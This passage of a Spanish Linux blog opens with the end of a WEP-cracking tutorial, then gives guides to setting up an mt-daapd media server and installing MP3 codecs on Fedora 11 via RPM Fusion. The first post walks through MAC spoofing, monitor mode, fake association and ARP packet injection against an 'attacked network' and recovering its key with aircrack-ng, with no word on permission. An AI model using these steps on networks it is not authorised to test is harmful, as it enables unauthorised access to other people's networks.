>>tarjeta de red desactiva: no sale nada por pantalla.

macchanger –mac 00:11:22:33:44:55 ra0

>>Current mac: xx:xx:xx:xx:xx:xx Fake mac:00:11:22:33:44:55: nos da la mac original y la falsa que hemos nos hemos asignado para luego poder inyectar paquetes.

airmon-ng start ra0

>>monitor mode enable: Ponemos nuestra tarjeta en modo monitor(necesario para poder capturar paquetes)

*** Escaneo de redes y clientes asociados

airodump-ng ra0

>>redes y clientes disponibles: nos sale una tabla con las redes disponibles con toda la información como canal, nombre, calidad de señal, tipo de encriptación, etc.. y los clientes que están conectadas a las redes.

Paramos la ejecución del comando pulsando “Control+C”, o cerrando y abriendo otra terminal.

airodump-ng –c NumeroDeCanal –w ArchivoDeCapturas –bssid BBSID ra0

Por ejemplo una red en canal 11 con BSSID 00:01:02:03:04:C1 que hemos detectado: airodump-ng -c 11 -w capturaswifi - - bssid 00:01:02:03:04:C1

>>Capturando paquetes…: nos va saliendo la captura de paquetes así como la señal de la red y los clientes asociados. Dejamos recogiendo paquetes, por lo que ESTA TERMINAL NO LA CIERRES!!!


Abre una nueva terminal (consola) con privilegios de superusuario(root) como antes.

aireplay-ng -1 0 –a BSSID –h 00:11:22:33:44:55 –e ESSID ra0

>>Association successful: Con esto hacemos una autenticación falsa en el router. Para ello en el comando se necesita la BSSID de la red atacada, la mac falsa que nos pusimos (00:11:22:33:44:55) y el nombre que tiene la red atacada, es decir, la ESSID. Es importante que nos salga el Association Succesful, de lo contrario no podremos inyectar paquetes. Por ejemplo: aireplay-ng 1 0 -a 00:01:02:03:04:05 -h 00:11:22:33:44:55 -e WIFI_RED ra0.

aireplay-ng -3 –b BSID –h 00:11:22:33:44:55 ra0

>>Envío de paquetes…: nos saldrá por pantalla que se están mandando paquetes, para que la inyección sea correcta deben aparecer paquetes ARP recogidos. Por ejemplo: aireplay-ng -3 -b 00:01:02:03:04:05 -h 00:11:22:33:44:55 ra0. Ahora dejamos que siga inyectando paquetes, por tanto NO CIERRES ESTA TERMINAL!!!

*** Crackeo WEP

Para poder obtener la clave WEP es necesario tener un mínimo de paquetes recogidos. El número de paquetes dependerá de la longitud que tenga la clave WEP. Como mínimo recomiendo que empecéis a intentar conseguir la clave a partir de 25.000 por si la clave es de las cortas.

Cuando veamos en la terminal que dejamos el airodump-ng recogiendo paquetes que tenemos más de 25.000 #data recogidos.

Abre una nueva terminal (consola) con privilegios de superusuario(root) como antes.

aircrack-ng –b BSSID ArchivoDeCapturas.cap

>>Clave WEP encontrada/no encontrada: El programa empezará a descifrar los paquetes recogidos, y cuando finalice nos dirá si ha encontrado la clave o no. Si no la encuentra nos recomienda que lo volvamos a intentar superados “X” paquetes recogidos. Si la encuentra nos saldrá: KEY FOUND! y la clave en hexadecimal normalmente.

Fuente:

www.aircrack.org


Saludos,


David Loor M.

viernes, 12 de febrero de 2010

Implementación Servidor DAAP Linux (Compartir Fonotecas)

Existen dos formas simples de compartir archivos con dispositivos que se encuentren en una misma red.
  1. Compartiendo la carpeta de tus archivos: Bastante ineficiente ya que la biblioteca musical compartida no está ordenada y nos será difícil encontrar los medios que queremos reproducir.
  2. Mediante un Servidor de Medios: Bastante fácil y cómodo de utilizar, una vez que se ha configurado el servidor, los clientes pueden hacer acceder a él conociendo la IP y el puerto por el cuál escucha las peticiones. Nuestro reproductor no tardará ni 5 segundos en agregar un promedio de 10000 canciones (lo digo por experiencia propia, en una red no muy saturada), y toda la información multimedia (titulo, artista, tiempo de duración, álbum, etc) se descargará automáticamente.
Tomando en consideración las premisas anteriores implementaremos un servidor con el protocolo DAAP (Digital Audio Access Protocol, Protocolo de Acceso a Audio Digital).

Este es un protocolo privativo desarrollado por Apple para usarlo en su ya conocido itunes para compartir archivos multimedia entre usuarios de esta aplicación. Apple no ha liberado las especificaciones de este protocolo pero haciendo ingeniería inversa han logrado obtener un DAAP libre, se esta convirtiendo por si mismo en un estándar ya que algunas casas comerciales de reproductores ya lo implementan.

La configuración es bastante sencilla, no toma más de 10 minutos su configuración. Sin más palabreo, vamos a la configuración.


  • Bajamos los paquetes necesarios para su funcionamiento:

Debian, Ubuntu

sudo apt-get install mt-daapd avahi-daemon libid3tag0

Fedora, Centos, Redhat

sudo yum install mt-daapd avahi-daemon libid3tag0


  • Configuramos los servicios para arrancar en el inicio del sistema.
chkconfig avahi-daemon on
chkconfig mt-daapd on

  • Debemos configurar el archivo /etc/mt-daapd.conf, donde especificamos el nombre del servidor, directorio donde tenemos almacenado en nuestro servidor. También lo podemos hacer atravez de su interfaz web en esta dirección http://localhost:3689/.
"El campo usuario lo dejamos en blanco y como contraseña ingresamos mt-daapd.

En la sección de configuración tenemos que cambiar algunas cosas para iniciar un servidor básico:

Admin password: Para dejar de usar la contraseña por defecto (recomendable)

Music folder: Acá agregamos la(s) carpeta(s) que contienen las canciones que deseamos compartir.

Otras opciones que podemos cambiar (pero que no son vitales) son: Server Name (el nombre que será visto por los clientes), Music Password (si es que deseamos que los clientes ingresen una contraseña para poder acceder a la música) y Rescan Interval (cada cuanto tiempo deseamos que Firefly busque nuevas canciones en los directorios, importante si constantemente agregamos nueva música).

Configuración extra

Hay una opción de configuración a la que hay que prestarle atención: Run As (se accede a ella dando click al link para mostrar las opciones avanzadas). Esta opción especifica con qué usuario correrá el servicio de Firefly y por defecto está con mt-daapd (al momento de la instalación se creó automáticamente este usuario del sistema).

Si es que el usuario mt-daapd no tiene los permisos de lectura sobre las carpetas donde están los archivos de audio, el servidor no podrá agregarlas a la biblioteca. Tenemos 2 opciones:

  • Cambiar la opción Run As a root que es lo más sencillo pero menos recomendable (por inseguro). Si el servidor está en un “ambiente seguro” (tu casa, no accesible desde internet, etc.) podría usarse esta opción.
  • Dar al usuario mt-daapd los permisos sobre las carpetas. Esto también es sencillo, pero implica algunos pasos extra." Ver Fuente

Para acceder desde un cliente, por ejemplo usando el reproductor Rhythmbox debemos seguir los siguientes pasos:

  1. Ejecutar Rhythmbox
  2. Nos vamos a musica/Conectar con una compartición DAAP
  3. Ponemos equipo:puerto (dirección_IP_del_servidor:3689)
Los reproductores que son compatibles con el protocolo DAAP los podemos ver en este enlace: Ver Reproductores compatibles


Saludos,

jueves, 11 de febrero de 2010

Reproducir Archivos multimedia (MP3, DVD, etc) en Fedora 11

Quería escuchar mi música preferida en Fedora y resulta que no venía instalado por defecto el decodificador de MP3, Rhythmbox trataba de buscarlos automáticamente en internet pero no los encontraba. Me preocupaba ya que Ubuntu bucaba todos los paquetes que yo necesitaba ahorrándome el trabajo, así que no tenía ni idea de qué debía instalar.

Buscando un poco de información al respecto en Google, descubrí que Fedora y Red Hat no traían pre-instalado paquetes que los puedan comprometer legalmente, cómo por ejemplo el algoritmo de codificación/decodificación de Mp3 es patentado y penado por las leyes de EEUU; asi que para poder reproducir nuestra música preferidad grabada en formato Mp3 o formatos patentados, debemos instalar rpm-fusion, el paquete que nos permite instalar de una manera fácil cualquier otro tipo de paquete, valga la redundancia, patentado o no patentado.

http://fedoraproject.org/wiki/ForbiddenItems

En ese enlace podemos obtener información oficial.

Después de una introducción no muy técnica, pasamos a la instalación de lo que necesitamos para reproducir nuestros archivos multimedia.

  1. $ su root

    # rpm -ivh http://download1.rpmfusion.org/free/fedora/rpmfusion-free-release-stable.noarch.rpm
    # rpm -ivh http://download1.rpmfusion.org/nonfree/fedora/rpmfusion-nonfree-release-stable.noarch.rpm
  2. # yum -y update @sound-and-video 
Estos dos pasos instalarán primero el rpmfusion "para paquetes libres y restritivos", además instalara los codecs para que los motores Xine y Gstreamer tengan mayor soporte para archivos multimedia.


Saludos,